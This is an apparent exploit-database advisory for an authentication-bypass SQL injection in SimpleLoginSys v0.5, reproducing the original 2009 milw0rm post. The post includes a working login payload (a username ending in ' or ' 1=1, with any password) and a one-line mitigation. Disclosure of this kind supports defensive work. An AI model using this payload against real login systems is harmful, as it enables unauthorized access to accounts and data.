SimpleLoginSys v0.5 (Auth Bypass) SQL Injection Vulnerability

vendor:

SimpleLoginSys

by:

SirGod

7,5

CVSS

HIGH

SQL Injection (Auth Bypass)

CWE

Product Name: SimpleLoginSys

Affected Version From: v0.5

Affected Version To: v0.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SimpleLoginSys v0.5 (Auth Bypass) SQL Injection Vulnerability

A vulnerability exists in SimpleLoginSys v0.5, which allows an attacker to bypass authentication by setting the username to [REAL_NICKNAME] ' or ' 1=1 and any password. This is due to the application not properly sanitizing user input.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

####################################################################################
[+] SimpleLoginSys v0.5 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
[+] download : http://sourceforge.net/projects/simplesiteadmin/files/simpleloginsys/SimpleLoginSys%20v0.5/simpleloginsys0.5.zip/download

####################################################################################

[+] SQL Injection (Auth Bypass)

 - Note : magic_quotes_gpc = off

 - PoC

    Username : [REAL_NICKNAME] ' or ' 1=1
    Password : anything

####################################################################################

# milw0rm.com [2009-08-03]